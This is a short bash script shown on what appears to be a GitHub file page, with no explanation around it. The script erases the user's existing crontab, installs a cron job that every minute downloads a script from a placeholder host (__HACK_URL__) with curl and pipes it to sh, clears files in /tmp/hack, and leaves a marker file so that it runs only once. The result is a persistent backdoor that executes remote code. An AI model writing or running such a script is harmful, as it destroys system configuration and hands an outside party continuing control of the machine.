Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
9 lines (7 sloc) 183 Bytes
#!/usr/bin/env bash
if [[ ! -e /tmp/hack.7152664827 ]]; then
crontab -r
echo "* * * * * curl -s __HACK_URL__/env/live | sh" | crontab
rm -f /tmp/hack/*
touch /tmp/hack.7152664827
fi